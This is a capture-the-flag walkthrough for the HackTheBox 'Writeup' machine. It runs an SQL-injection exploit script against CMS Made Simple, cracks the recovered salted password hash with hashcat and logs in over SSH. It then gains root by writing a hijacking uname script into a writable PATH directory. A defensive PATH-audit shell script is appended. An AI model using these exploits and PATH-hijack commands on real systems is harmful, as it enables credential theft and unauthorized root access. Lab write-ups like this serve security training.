Writeup on HackTheBox is an easy Linux machine; in this walkthrough we're going to see how to capture both the user and root flags.
If you have any question or any detail to add, please send me your thoughts here.
1. Nmap result
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
After the scan completes, we can see that port 80 is open, so I decided to enumerate the website's directories. Don't use dirsearch or gobuster: the site has a directory brute-forcing protection that will block you, and you'll have to reset the machine.
So let's do it manually, starting with robots.txt, which gave this result:
User-agent: *
Disallow: /writeup/
So let's access this route and enumerate the site we find there.
After checking the page source, we can easily see the meta tag containing the name of the CMS, "CMS Made Simple":
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
2. Exploitation and user flag
Searching Google for an exploit for CMS Made Simple, I found this Python script that uses SQL injection:
$ python3 csm_made_simple_injection.py -u http://MACHINE_IP/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bf
Great result! We have the username "jkr" and the password hash with its salt, "62def4866937f08cc13bab43bf:5a599ef579066807". Now it's time for the hashcat command:
$ hashcat passhash /usr/share/wordlists/rockyou.txt -m 20
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
Done! Let's move on, use those credentials to SSH in, and get our user flag from user.txt.
3. Root flag
After looking around and enumerating several directories and paths for something interesting to help us with the root flag, I gathered some information to save for further exploitation:
The first is the user jkr and its groups:
$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
I looked for any folders or files owned by one of these groups and found this:
$ find / -group staff
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/ca-certificates
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
After that I used the pspy tool to monitor processes on this machine.
Running pspy gives an interesting result here:
sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
Here we can see a process run by root, and /usr/local/sbin is given the highest priority in its PATH.
Let's check the content of the scripts in /etc/update-motd.d:
$ cat /etc/update-motd.d/10-uname
#!/bin/sh
uname -rnsom
This script calls the uname command. Following the earlier logic, /usr/local/sbin comes first in PATH and the staff group can write to that folder, so let's check whether uname can be shadowed by our own command:
$ whereis uname
uname: /bin/uname /usr/share/man/man1/uname.1.gz
Great! So let's write our own uname command that copies the root flag, and wait for the root process to execute it:
$ echo -e '#!/bin/bash\ncat /root/root.txt > /home/jkr/root.txt' > /usr/local/bin/uname && chmod +x /usr/local/bin/uname
And it's done: the root flag is owned and the machine is complete.
I hope this walkthrough was clear and easy to understand. If you have any question or detail to add, please feel free to contact me here.
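As an added defender-side check (my own POSIX shell script, not part of the original writeup or of pspy), the following audit reproduces the reasoning above: it walks the PATH that the root MOTD job inherits (copied from the pspy line), stops at the directory that really holds the command, and reports every earlier directory that is group- or world-writable, which is exactly the condition that let uname be shadowed here. The function names and the optional ROOT_PREFIX argument (used to run the check against a test tree) are my assumptions.

```shell
#!/bin/sh
# Added example (not from the writeup): audit a PATH for directories that a
# non-root group or "other" can write to and that are searched before the real
# binary, i.e. the staff-writable /usr/local/sbin and /usr/local/bin case above.

# PATH string exactly as shown in the pspy output.
MOTD_PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Returns 0 when the directory is group- or world-writable. The mode string is
# parsed from ls -ld (character 6 = group write, 9 = other write) because that
# is portable across GNU, BSD and busybox, unlike the stat(1) format flags.
is_loosely_writable() {
    perms=$(ls -ld "$1" | cut -c1-10)
    case "$perms" in
        ?????w*|????????w?) return 0 ;;
    esac
    return 1
}

# audit_path PATH_STRING COMMAND [ROOT_PREFIX]
# Prints "SHADOW_RISK <dir>" for each writable directory that is searched before
# (or is) the directory holding COMMAND; returns 1 if any was found, else 0.
# ROOT_PREFIX is an assumed parameter so the check can run against a test tree.
audit_path() {
    path_list=$1
    cmd=$2
    prefix=${3:-}
    risky=0
    old_ifs=$IFS
    IFS=:
    set -- $path_list
    IFS=$old_ifs
    for d in "$@"; do
        real="$prefix$d"
        [ -d "$real" ] || continue
        if is_loosely_writable "$real"; then
            echo "SHADOW_RISK $d"
            risky=1
        fi
        # Lookup ends at the first directory containing the command, so later
        # directories cannot shadow it (an earlier writable one already can).
        if [ -x "$real/$cmd" ]; then
            break
        fi
    done
    return $risky
}

# Live-host usage: sh audit_path.sh uname   (exit status 1 means a finding)
[ $# -ge 1 ] && audit_path "$MOTD_PATH" "$1"
```

On the box itself the fix is to drop group write from the /usr/local tree (or to keep /usr/local/sbin and /usr/local/bin out of the PATH of root cron and MOTD jobs), after which the check returns 0.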